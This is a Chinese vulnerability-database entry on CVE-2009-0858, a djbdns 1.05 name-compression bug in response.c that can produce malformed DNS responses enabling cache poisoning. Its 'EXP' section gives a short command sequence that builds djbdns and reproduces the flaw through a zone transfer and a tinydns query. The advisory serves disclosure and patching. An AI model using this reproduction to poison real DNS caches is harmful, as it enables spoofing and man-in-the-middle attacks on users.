djbdns超长响应报文远程缓存中毒漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117427 漏洞类型 输入验证
发布时间 2009-02-27 更新时间 2009-07-15
CVE编号 CVE-2009-0858 CNNVD-ID CNNVD-200903-185
漏洞平台 Linux CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/32825
https://www.securityfocus.com/bid/33937
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-185
|漏洞详情
djbdns是一个由Qmail的作者所设计的轻量级DNSserver。djbdns的response.c文件负责处理名称压缩。该文件12行对name_ptr数组有each<16384的标注,但response_addname()没有强制这个限制。如果用户向报文中编码的名称中第一个后缀大于或等于16384字节的话,response_addname()就会错误的编码到名称的偏移,生成畸形的响应报文。这种响应报文会给查询用户误导性信息,有助于攻击者执行中间人等网络欺骗攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/33937/info

The 'djbdns' package is prone to a remote cache-poisoning vulnerability.

An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

This issue affects djbdns 1.05; other versions may also be vulnerable.

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# www.example.com from www.example2.com.
$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.example.com using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.example.com
|受影响的产品
djbdns djbdns 1.05 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0
|参考资料

来源:MISC
链接:http://securityandthe.net/2009/03/05/security-issue-in-djbdns-confirmed/
来源:XF
名称:djbdns-response-packet-spoofing(49003)
链接:http://xforce.iss.net/xforce/xfdb/49003
来源:BID
名称:33937
链接:http://www.securityfocus.com/bid/33937
来源:BUGTRAQ
名称:20090305Re:djbdnsmisformatssomelongresponsepackets;patchandexampleattack
链接:http://www.securityfocus.com/archive/1/archive/1/501479/100/0/threaded
来源:BUGTRAQ
名称:20090228Re:djbdnsmisformatssomelongresponsepackets;patchandexampleattack
链接:http://www.securityfocus.com/archive/1/archive/1/501340/100/0/threaded
来源:BUGTRAQ
名称:20090226djbdnsmisformatssomelongresponsepackets;patchandexampleattack
链接:http://www.securityfocus.com/archive/1/archive/1/501294/100/0/threaded
来源:DEBIAN
名称:DSA-1831
链接:http://www.debian.org/security/2009/dsa-1831
来源:SECUNIA
名称:35820
链接:http://secunia.com/advisories/35820
来源:MLIST
名称:[dns]20090304djbdns<=1.05letsAXFRedsubdomainsoverwritedomains
链接:http://marc.info/?l=djbdns&m=123613000920446&w=2
来源:MLIST
名称:[dns]20090225djbdns